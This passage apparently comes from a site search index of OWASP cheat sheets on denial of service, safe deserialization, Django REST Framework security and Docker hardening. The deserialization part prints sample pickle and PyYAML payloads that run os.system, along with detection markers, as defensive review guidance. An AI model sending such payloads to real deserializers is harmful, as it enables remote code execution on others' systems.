Considering that anti-DoS approaches are not one-step solutions, it becomes apparent that, for it to be implemented, it's necessary to involve different profiles within your organization to assess the actual situation and to apply countermeasures accordingly. These profiles are: developers and architects in the area of application and infrastructure.

Key concepts within information security evolve around criteria or properties such as the CIA triad. The letter A, which stands for availability, is our focal point. The core essence of a DoS is to affect, by any means, the availability of instances or objects and to eventually render it inaccessible. Thus, for any information system to serve its purpose, it must be available at any time. Hence why every computing system within the interoperability flow must function correctly to achieve that.

To remain resilient and resistant, it's imperative - and suggested - to outline and to conduct a thorough analysis on components within your inventory based on functionality, architecture and performance (i.e. application-wise, infrastructure and network related).

The outcome of this research should identify potential causes of a DoS which highlight single point of failures ranging from programming related errors to resource exhaustion..

From a prevention point of view, it's important to have a clear picture on how to tackle your appropriate components to address the issue at stake (e.g. bottlenecks, etc.). That's why a solid understanding of your environment is essential to develop a suitable defence mechanism. These could be aligned with:

  1. scaling options (up = inner hardware components, out = the number of complete components)
  2. existing conceptual / logical techniques (such as applying redundancy measurements, bulk-heading, etc. - which expands your in-house capabilities)
  3. a cost analysis applied to your situation

Within this document we will adhere to a particular guidance structure to illustrate on how to analyse this subject based on your situation. It is by no means a complete approach but we ought to create fundamental blocks which should be utilized to assist you in constructing anti-DoS concepts fitting to your needs.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#general-categories-and-basic-controls","title":"General Categories and Basic Controls","text":"

In this cheat sheet, we will adhere to the DDOS classification as documented by CERT-EU. The document categorizes the 7 OSI model layers into three main attack categories, namely application, Session and Network.

TODO: Add Diagram

Application attacks focus on rendering applications unavailable by exhausting resources or by making it unusable in a functional way. Session (or protocol) attacks focus on consuming server resources, or resources of intermediary equipment like firewalls and load-balancers. Network (or volumetric) attacks focus on saturating the bandwidth of the network resource. It is important to understand that each of these three attack categories needs to be considered when designing a DoS resilient solution.

Note that OSI model layer 1 and 2 are not included in this categorization. In the spirit of providing a complete overview of all DoS type of attacks, we will shortly discuss these layers and how DoS applies to them.

The physical layer consists of the networking hardware transmission technologies of a network. It is a fundamental layer underlying the logical data structures of the higher-level functions in a network. Typical DoS scenarios are destruction, obstruction, malfunction. An example is a case where a Georgian elderly woman sliced through an underground cable, resulting in loss of internet for the whole of Armenia.

The data layer is the protocol layer that transfers data between adjacent network nodes in a wide area network (WAN) or between nodes on the same local area network (LAN) segment. Typical DoS scenarios are MAC flooding (targeting switch MAC tables) and ARP poisoning.

In MAC flooding attacks, a switch is flooded with packets, each with a different source MAC address. The intention is to consume the limited memory used by a switch to store the MAC and physical port translation table (MAC table). The result is that valid MAC addresses are purged and the switch enters a fail-over mode where it will act as a network hub. All data is then forwarded to all ports, resulting in a data leakage. TODO impact in relation to DoS TODO document compact remediation

In ARP poisoning attacks a malicious actor sends spoofed ARP (Address Resolution Protocol) messages over the wire. The result is that the attacker's MAC address can be linked to the IP address of a legitimate device on the network. This allows an attacker to intercept, modify or stop data in transit, that was intended for the victim IP address. The ARP protocol is specific to the local area network and could cause a DoS on the wire communication.

Packet filtering technology can be used to inspect packets in transit to identify and block offending ARP packets. Another approach is to use static ARP tables but they prove difficult to be maintained.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#application-attacks","title":"Application attacks","text":"

Application layer attacks focus on rendering applications unavailable by exhausting resources or by making it unusable in a functional way. These attacks do not have to consume the network bandwidth to be effective. Rather they place an operational strain on the application server in such a way that the server becomes unavailable, unusable or non-functional. All attacks exploiting weaknesses on OSI layer 7 protocol stack are generally categorised as application attacks. They are most challenging to identify/mitigate.

TODO: List all attacks per category. Because we cannot map remediations one on one with an attack vector, we will first need to list them before discussing the action points

Slow HTTP is a DoS attack type where HTTP requests are send very slow and fragmented, one at a time. Until the HTTP request was fully delivered, the server will keep resources stalled while waiting for the missing incoming data. At one moment, the server will reach the maximum concurrent connection pool, resulting in a DoS. From an attacker's perspective, slow HTTP attacks are cheap to perform because they require minimal resources.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#software-design-concepts","title":"Software Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#session","title":"Session","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#access-control","title":"Access control","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-attacks","title":"Network attacks","text":"

TODO: (Develop text) Attacks where network bandwidth gets saturation. Volumetric in nature. Amplification techniques make these attacks effective.

TODO: (list attacks) NTP amplification, DNS amplification, UDP flooding, TCP flooding

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-design-concepts","title":"Network Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#rate-limiting","title":"Rate limiting","text":"

Rate limiting is the process of controlling traffic rate from and to a server or component. It can be implemented on infrastructure as well as on an application level. Rate limiting can be based on (offending) IPs, on IP block lists, on geolocation, etc.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#isp-level-remediations","title":"ISP-Level remediations","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#global-level-remediations-commercial-cloud-filter-services","title":"Global-Level remediations: Commercial cloud filter services","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html","title":"Deserialization Cheat Sheet","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, actionable guidance for safely deserializing untrusted data in your applications.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#what-is-deserialization","title":"What is Deserialization","text":"

Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them for storage, or to send as part of communications.

Deserialization is the reverse of that process, taking data structured in some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.

However, many programming languages have native ways to serialize objects. These native formats usually offer more features than JSON or XML, including customizability of the serialization process.

Unfortunately, the features of these native deserialization mechanisms can sometimes be repurposed for malicious effect when operating on untrusted data. Attacks against deserializers have been found to allow denial-of-service, access control, or remote code execution (RCE) attacks.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#guidance-on-deserializing-objects-safely","title":"Guidance on Deserializing Objects Safely","text":"

The following language-specific guidance attempts to enumerate safe methodologies for deserializing data that can't be trusted.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#php","title":"PHP","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review","title":"WhiteBox Review","text":"

Check the use of unserialize() function and review how the external parameters are accepted. Use a safe, standard data interchange format such as JSON (via json_decode() and json_encode()) if you need to pass serialized data to the user.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#python","title":"Python","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review","title":"BlackBox Review","text":"

If the traffic data contains the symbol dot . at the end, it's very likely that the data was sent in serialization.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_1","title":"WhiteBox Review","text":"

The following API in Python will be vulnerable to serialization attack. Search code for the pattern below.

  1. The uses of pickle/c_pickle/_pickle with load/loads:
import pickle\ndata = \"\"\" cos.system(S'dir')tR. \"\"\"\npickle.loads(data)\n
  1. Uses of PyYAML with load:
import yaml\ndocument = \"!!python/object/apply:os.system ['ipconfig']\"\nprint(yaml.load(document))\n
  1. Uses of jsonpickle with encode or store methods.
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#java","title":"Java","text":"

The following techniques are all good for preventing attacks against deserialization against Java's Serializable format.

Implementation advices:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_2","title":"WhiteBox Review","text":"

Be aware of the following Java API uses for potential serialization vulnerability.

1.\u00a0XMLdecoder\u00a0with\u00a0external\u00a0user\u00a0defined\u00a0parameters

2.\u00a0XStream\u00a0with\u00a0fromXML\u00a0method (xstream\u00a0version\u00a0<=\u00a0v1.4.6\u00a0is\u00a0vulnerable\u00a0to\u00a0the\u00a0serialization\u00a0issue)

3.\u00a0ObjectInputStream\u00a0with\u00a0readObject

4.\u00a0Uses\u00a0of\u00a0readObject,\u00a0readObjectNoData,\u00a0readResolve or\u00a0readExternal

5.\u00a0ObjectInputStream.readUnshared

6.\u00a0Serializable

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_1","title":"BlackBox Review","text":"

If the captured traffic data includes the following patterns, it may suggest that the data was sent in Java serialization streams:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-data-leakage-and-trusted-field-clobbering","title":"Prevent Data Leakage and Trusted Field Clobbering","text":"

If there are data members of an object that should never be controlled by end users during deserialization or exposed to users during serialization, they should be declared as the transient keyword (section Protecting Sensitive Information).

For a class that defined as Serializable, the sensitive information variable should be declared as private transient.

For example, the class myAccount, the variables 'profit' and 'margin' were declared as transient to prevent them from being serialized.

public class myAccount implements Serializable\n{\nprivate transient double profit; // declared transient\n\nprivate transient double margin; // declared transient\n....\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-deserialization-of-domain-objects","title":"Prevent Deserialization of Domain Objects","text":"

Some of your application objects may be forced to implement Serializable due to their hierarchy. To guarantee that your application objects can't be deserialized, a readObject() method should be declared (with a final modifier) which always throws an exception:

private final void readObject(ObjectInputStream in) throws java.io.IOException {\nthrow new java.io.IOException(\"Cannot be deserialized\");\n}\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-your-own-javaioobjectinputstream","title":"Harden Your Own java.io.ObjectInputStream","text":"

The java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. This is the best solution if:

The general idea is to override ObjectInputStream.html#resolveClass() in order to restrict which classes are allowed to be deserialized.

Because this call happens before a readObject() is called, you can be sure that no deserialization activity will occur unless the type is one that you allow.

A simple example is shown here, where the LookAheadObjectInputStream class is guaranteed to not deserialize any other type besides the Bicycle class:

public class LookAheadObjectInputStream extends ObjectInputStream {\n\npublic LookAheadObjectInputStream(InputStream inputStream) throws IOException {\nsuper(inputStream);\n}\n\n/**\n    * Only deserialize instances of our expected Bicycle class\n    */\n@Override\nprotected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {\nif (!desc.getName().equals(Bicycle.class.getName())) {\nthrow new InvalidClassException(\"Unauthorized deserialization attempt\", desc.getName());\n}\nreturn super.resolveClass(desc);\n}\n}\n

More complete implementations of this approach have been proposed by various community members:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-all-javaioobjectinputstream-usage-with-an-agent","title":"Harden All java.io.ObjectInputStream Usage with an Agent","text":"

As mentioned above, the java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. However, if you don't own the code or can't wait for a patch, using an agent to weave in hardening to java.io.ObjectInputStream is the best solution.

Globally changing ObjectInputStream is only safe for block-listing known malicious types, because it's not possible to know for all applications what the expected classes to be deserialized are. Fortunately, there are very few classes needed in the blocklist to be safe from all the known attack vectors, today.

It's inevitable that more \"gadget\" classes will be discovered that can be abused. However, there is an incredible amount of vulnerable software exposed today, in need of a fix. In some cases, \"fixing\" the vulnerability may involve re-architecting messaging systems and breaking backwards compatibility as developers move towards not accepting serialized objects.

To enable these agents, simply add a new JVM parameter:

-javaagent:name-of-agent.jar\n

Agents taking this approach have been released by various community members:

A similar, but less scalable approach would be to manually patch and bootstrap your JVM's ObjectInputStream. Guidance on this approach is available here.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp","title":".Net CSharp","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_3","title":"WhiteBox Review","text":"

Search the source code for the following terms:

  1. TypeNameHandling
  2. JavaScriptTypeResolver

Look for any serializers where the type is set by a user controlled variable.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_2","title":"BlackBox Review","text":"

Search for the following base64 encoded content that starts with:

AAEAAAD/////\n

Search for content with the following text:

  1. TypeObject
  2. $type:
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#general-precautions","title":"General Precautions","text":"

Microsoft has stated that the BinaryFormatter type is dangerous and cannot be secured. As such, it should not be used. Full details are in the BinaryFormatter security guide.

Don't allow the datastream to define the type of object that the stream will be deserialized to. You can prevent this by for example using the DataContractSerializer or XmlSerializer if at all possible.

Where JSON.Net is being used make sure the TypeNameHandling is only set to None.

TypeNameHandling = TypeNameHandling.None\n

If JavaScriptSerializer is to be used then do not use it with a JavaScriptTypeResolver.

If you must deserialise data streams that define their own type, then restrict the types that are allowed to be deserialized. One should be aware that this is still risky as many native .Net types potentially dangerous in themselves. e.g.

System.IO.FileInfo\n

FileInfo objects that reference files actually on the server can when deserialized, change the properties of those files e.g. to read-only, creating a potential denial of service attack.

Even if you have limited the types that can be deserialised remember that some types have properties that are risky. System.ComponentModel.DataAnnotations.ValidationException, for example has a property Value of type Object. if this type is the type allowed for deserialization then an attacker can set the Value property to any object type they choose.

Attackers should be prevented from steering the type that will be instantiated. If this is possible then even DataContractSerializer or XmlSerializer can be subverted e.g.

// Action below is dangerous if the attacker can change the data in the database\nvar typename = GetTransactionTypeFromDatabase();\n\nvar serializer = new DataContractJsonSerializer(Type.GetType(typename));\n\nvar obj = serializer.ReadObject(ms);\n

Execution can occur within certain .Net types during deserialization. Creating a control such as the one shown below is ineffective.

var suspectObject = myBinaryFormatter.Deserialize(untrustedData);\n\n//Check below is too late! Execution may have already occurred.\nif (suspectObject is SomeDangerousObjectType)\n{\n//generate warnings and dispose of suspectObject\n}\n

For JSON.Net it is possible to create a safer form of allow-list control using a custom SerializationBinder.

Try to keep up-to-date on known .Net insecure deserialization gadgets and pay special attention where such types can be created by your deserialization processes. A deserializer can only instantiate types that it knows about.

Try to keep any code that might create potential gadgets separate from any code that has internet connectivity. As an example System.Windows.Data.ObjectDataProvider used in WPF applications is a known gadget that allows arbitrary method invocation. It would be risky to have this a reference to this assembly in a REST service project that deserializes untrusted data.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#known-net-rce-gadgets","title":"Known .NET RCE Gadgets","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#language-agnostic-methods-for-deserializing-safely","title":"Language-Agnostic Methods for Deserializing Safely","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#using-alternative-data-formats","title":"Using Alternative Data Formats","text":"

A great reduction of risk is achieved by avoiding native (de)serialization formats. By switching to a pure data format like JSON or XML, you lessen the chance of custom deserialization logic being repurposed towards malicious ends.

Many applications rely on a data-transfer object pattern that involves creating a separate domain of objects for the explicit purpose data transfer. Of course, it's still possible that the application will make security mistakes after a pure data object is parsed.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#only-deserialize-signed-data","title":"Only Deserialize Signed Data","text":"

If the application knows before deserialization which messages will need to be processed, they could sign them as part of the serialization process. The application could then to choose not to deserialize any message which didn't have an authenticated signature.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#mitigation-toolslibraries","title":"Mitigation Tools/Libraries","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#detection-tools","title":"Detection Tools","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html","title":"Django REST Framework (DRF) Cheat Sheet","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheat sheet intends to provide quick basic Django REST Framework security tips for developers.

The Django REST framework abstracts developers from quite a bit of tedious work and provides the means to build APIs quickly and with ease using Django. New developers, those unfamiliar with the inner workings of Django, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#settings","title":"Settings","text":"

All the Django REST Framework (DRF) configuration is done under the namespace REST_FRAMEWORK, usually in the settings.py file. From a security perspective, the most relevant ones are:

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_authentication_classes","title":"DEFAULT_AUTHENTICATION_CLASSES","text":"

A list of authentication classes that determines the default set of authenticators used when accessing the request.user or request.auth properties. In other words, what classes should be used to identify which user is authenticated.

Defaults are 'rest_framework.authentication.SessionAuthentication', 'rest_framework.authentication.BasicAuthentication', that means that by default it checks the session and basic authentication for the user.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_permission_classes","title":"DEFAULT_PERMISSION_CLASSES","text":"

A list of permission classes that determines the default set of permissions checked at the start of a view.

Permission must be granted by every class in the list. Default is 'rest_framework.permissions.AllowAny'18, that means that by default every view allows access to everybody.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_throttle_classes","title":"DEFAULT_THROTTLE_CLASSES","text":"

A list of throttle classes that determines the default set of throttles checked at the start of a view. Default is empty, that means that by default there is no throttling in place.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_pagination_class","title":"DEFAULT_PAGINATION_CLASS","text":"

The default class to use for queryset pagination. Pagination is disabled by default. Lack of proper pagination could lead to Denial of Service (DoS) in cases where there\u2019s a lot of data.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#owasp-api-security-top-10","title":"OWASP API Security Top 10","text":"

The OWASP API Security Top 10 is a list of the most critical security risks for APIs, developed by the Open Web Application Security Project (OWASP). It is intended to help organizations identify and prioritize the most significant risks to their APIs, so that they can implement appropriate controls to mitigate those risks.

This section is based on this. Your approach to securing your web API should be to start at the top threat A1 below and work down, this will ensure that any time spent on security will be spent most effectively spent and cover the top threats first and lesser threats afterwards. After covering the top 10 it is generally advisable to assess for other threats or get a professionally completed Penetration Test.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api12019-broken-object-level-authorization","title":"API1:2019 Broken Object Level Authorization","text":"

When using object-level permissions:

DO: Validate that the object can be accessed by the user using the method .check_object_permissions(request, obj). Example:

def get_object(self):\n    obj = get_object_or_404(self.get_queryset(), pk=self.kwargs[\"pk\"])\n    self.check_object_permissions(self.request, obj)\n    return obj\n

DO NOT: Override the method get_object() without checking if the request should have access to that object.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api22019-broken-user-authentication","title":"API2:2019 Broken User Authentication","text":"

DO: Use the setting value DEFAULT_AUTHENTICATION_CLASSES with the correct classes for your project.

DO: Have authentication on every non-public API endpoint.

DO NOT: Overwrite the authentication class on a class-based (variable authentication_classes) or function-based (decorator authentication_classes) view unless you are confident about the change and understand the impact.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api32019-excessive-data-exposure","title":"API3:2019 Excessive Data Exposure","text":"

DO: Review the serializer and the information you are displaying.

If the serializer is inheriting from ModelSerializer DO NOT use the exclude Meta property.

DO NOT: Display more information that the minimum required.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api42019-lack-of-resources-rate-limiting","title":"API4:2019 Lack of Resources & Rate Limiting","text":"

DO: Configure the setting DEFAULT_THROTTLE_CLASSES.

DO NOT: Overwrite the throttle class on a class-based (variable throttle_classes) or function-based (decorator throttle_classes) view unless you are confident about the change and understand the impact.

EXTRA: If possible rate limiting should also be done with a WAF or similar. DRF should be the last layer of rate limiting.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api52019-broken-function-level-authorization","title":"API5:2019 Broken Function Level Authorization","text":"

DO: Change the default value ('rest_framework.permissions.AllowAny') of DEFAULT_PERMISSION_CLASSES.

DO NOT: Use rest_framework.permissions.AllowAny except for public API endpoints.

DO: Use the setting value DEFAULT_PERMISSION_CLASSES with the correct classes for your project.

DO NOT: Overwrite the authorization class on a class-based (variable permission_classes) or function-based (decorator permission_classes) view unless you are confident about the change and understand the impact.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api62019-mass-assignment","title":"API6:2019 Mass Assignment","text":"

When using ModelForms:

DO: Use Meta.fields (allow list approach).

DO NOT: Use Meta.exclude (block list approach).

DO NOT: Use ModelForms.Meta.fields = \"__all__\"

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api72019-security-misconfiguration","title":"API7:2019 Security Misconfiguration","text":"

DO: Setup Django settings DEBUG and DEBUG_PROPAGATE_EXCEPTIONS to False.

DO: Setup Django setting SECRET_KEY to a random value. Never hardcode secrets.

DO: Have a repeatable hardening process leading to fast and easy deployment of a properly locked down environment.

DO: Have an automated process to continuously assess the effectiveness of the configuration and settings in all environments.

DO: Ensure API can only be accessed by the specified HTTP verbs. All other HTTP verbs should be disabled.

DO NOT: Use default passwords

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api82019-injection","title":"API8:2019 Injection","text":"

DO: Validate, filter, and sanitize all client-provided data, or other data coming from integrated systems.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sqli","title":"SQLi","text":"

DO: Use parametrized queries.

TRY NOT TO: Use dangerous methods like raw(), extra() and custom SQL (via cursor.execute()).

DO NOT: Add user input to dangerous methods (raw(), extra(), cursor.execute()).

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#rce","title":"RCE","text":"

DO NOT: Add user input to dangerous methods (eval(), exec() and execfile()).

DO NOT: Load user-controlled pickle files. This includes the pandas method pandas.read_pickle().

DO NOT: Load user-controlled YAML files using the method load().

DO: Use the Loader=yaml.SafeLoader for YAML files.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api92019-improper-assets-management","title":"API9:2019 Improper Assets Management","text":"

DO: Have an inventory of all API hosts and document important aspects of each one of them, focusing on the API environment (e.g., production, staging, test, development), who should have network access to the host (e.g., public, internal, partners) and the API version.

DO: Document all aspects of your API such as authentication, errors, redirects, rate limiting, cross-origin resource sharing (CORS) policy and endpoints, including their parameters, requests, and responses.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api102019-insufficient-logging-monitoring","title":"API10:2019 Insufficient Logging & Monitoring","text":"

DO: Log all failed authentication attempts, denied access, and input validation errors with sufficient user context to identify suspicious or malicious accounts.

DO: Create logs in a format suited to be consumed by a log management solution and should include enough detail to identify the malicious actor.

DO: Handle logs as sensitive data, and their integrity should be guaranteed at rest and transit.

DO: Configure a monitoring system to continuously monitor the infrastructure, network, and the API functioning.

DO: Use a Security Information and Event Management (SIEM) system to aggregate and manage logs from all components of the API stack and hosts.

DO: Configure custom dashboards and alerts, enabling suspicious activities to be detected and responded to earlier.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as: Log.Error(\"Error was thrown\"); rather log the stack trace, error message and user ID who caused the error.

DO NOT: Log sensitive data such as user's passwords, API Tokens or PII.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#other-security-risks","title":"Other security Risks","text":"

Below is a list of security risks for APIs not discussed in the OWASP API Security Top 10.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult to impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do threat model, security design review, code review, pair program and write unit tests.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#secret-management","title":"Secret Management","text":"

Secrets should never be hardcoded. The best practice is to use a Secret Manager. For more information review OWASP Secrets Management Cheat Sheet

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#updating-django-and-drf-and-having-a-process-for-updating-dependencies","title":"Updating Django and DRF and Having a Process for Updating Dependencies","text":"

An concern with every application, including Python applications, is that dependencies can have vulnerabilities.

One good practice is to audit the dependencies your project is using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update of response:

The Django Security team has a information on How Django discloses security issues.

Finally, an important aspect when considering if a new dependency should be added or not to the project is the \"Security Health\" of the library. How often it's updated? Does it have known vulnerabilities? Does it have an active community? etc. Some tools can help with this task (E.g. Snyk Advisor)

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sast-tools","title":"SAST Tools","text":"

There are several excellent open-source static analysis security tools for Python that are worth considering, including:

Bandit \u2013 Bandit is a tool designed to find common security issues in Python. To do this Bandit processes each file, builds an Abstract Syntax Tree (AST) from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report. Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Semgrep \u2013 Semgrep is a fast, open-source, static analysis engine for finding bugs, detecting vulnerabilities in third-party dependencies, and enforcing code standards. Developed by \u201cReturn To Corporation\u201d (usually referred to as r2c) and open-source contributors. It works based on rules, which can focus on security, language best practices, or something else. Creating a rule is easy and semgrep is very powerful. For Django there are 29 rules.

PyCharm Security \u2013 Pycharm-security is a plugin for PyCharm, or JetBrains IDEs with the Python plugin. The plugin looks at Python code for common security vulnerabilities and suggests fixes. It can also be executed from a Docker container. It has about 40 checks and some are Django specific.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html","title":"Docker Security Cheat Sheet","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Docker is the most popular containerization technology. Upon proper use, it can increase the level of security (in comparison to running applications directly on the host). On the other hand, some misconfigurations can lead to downgrade the level of security or even introduce new vulnerabilities.

The aim of this cheat sheet is to provide an easy to use list of common security mistakes and good practices that will help you secure your Docker containers.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rules","title":"Rules","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-0-keep-host-and-docker-up-to-date","title":"RULE #0 - Keep Host and Docker up to date","text":"

To prevent from known, container escapes vulnerabilities, which typically end in escalating to root/administrator privileges, patching Docker Engine and Docker Machine is crucial.

In addition, containers (unlike in virtual machines) share the kernel with the host, therefore kernel exploits executed inside the container will directly hit host kernel. For example, kernel privilege escalation exploit (like Dirty COW) executed inside a well-insulated container will result in root access in a host.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-1-do-not-expose-the-docker-daemon-socket-even-to-the-containers","title":"RULE #1 - Do not expose the Docker daemon socket (even to the containers)","text":"

Docker socket /var/run/docker.sock is the UNIX socket that Docker is listening to. This is the primary entry point for the Docker API. The owner of this socket is root. Giving someone access to it is equivalent to giving unrestricted root access to your host.

Do not enable tcp Docker daemon socket. If you are running docker daemon with -H tcp://0.0.0.0:XXX or similar you are exposing un-encrypted and unauthenticated direct access to the Docker daemon, if the host is internet connected this means the docker daemon on your computer can be used by anyone from the public internet. If you really, really have to do this, you should secure it. Check how to do this following Docker official documentation.

Do not expose /var/run/docker.sock to other containers. If you are running your docker image with -v /var/run/docker.sock://var/run/docker.sock or similar, you should change it. Remember that mounting the socket read-only is not a solution but only makes it harder to exploit. Equivalent in the docker-compose file is something like this:

volumes:\n- \"/var/run/docker.sock:/var/run/docker.sock\"\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-2-set-a-user","title":"RULE #2 - Set a user","text":"

Configuring the container to use an unprivileged user is the best way to prevent privilege escalation attacks. This can be accomplished in three different ways as follows:

  1. During runtime using -u option of docker run command e.g.:

    docker run -u 4000 alpine\n
  2. During build time. Simple add user in Dockerfile and use it. For example:

    FROM alpine\nRUN groupadd -r myuser && useradd -r -g myuser myuser\n<HERE DO WHAT YOU HAVE TO DO AS A ROOT USER LIKE INSTALLING PACKAGES ETC.>\nUSER myuser\n
  3. Enable user namespace support (--userns-remap=default) in Docker daemon

More information about this topic can be found at Docker official documentation

In kubernetes, this can be configured in Security Context using runAsNonRoot field e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nrunAsNonRoot: true\n...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-3-limit-capabilities-grant-only-specific-capabilities-needed-by-a-container","title":"RULE #3 - Limit capabilities (Grant only specific capabilities, needed by a container)","text":"

Linux kernel capabilities are a set of privileges that can be used by privileged. Docker, by default, runs with only a subset of capabilities. You can change it and drop some capabilities (using --cap-drop) to harden your docker containers, or add some capabilities (using --cap-add) if needed. Remember not to run containers with the --privileged flag - this will add ALL Linux kernel capabilities to the container.

The most secure setup is to drop all capabilities --cap-drop all and then add only required ones. For example:

docker run --cap-drop all --cap-add CHOWN alpine\n

And remember: Do not run containers with the --privileged flag!!!

In kubernetes this can be configured in Security Context using capabilities field e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\ncapabilities:\ndrop:\n- all\nadd:\n- CHOWN\n...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag","title":"RULE #4 - Add \u2013no-new-privileges flag","text":"

Always run your docker images with --security-opt=no-new-privileges in order to prevent escalate privileges using setuid or setgid binaries.

In kubernetes, this can be configured in Security Context using allowPrivilegeEscalation field e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nallowPrivilegeEscalation: false\n...\n

As a Kubernetes cluster administrator, you can refer to Kubernetes documentation to configure it using Pod Security Policies.

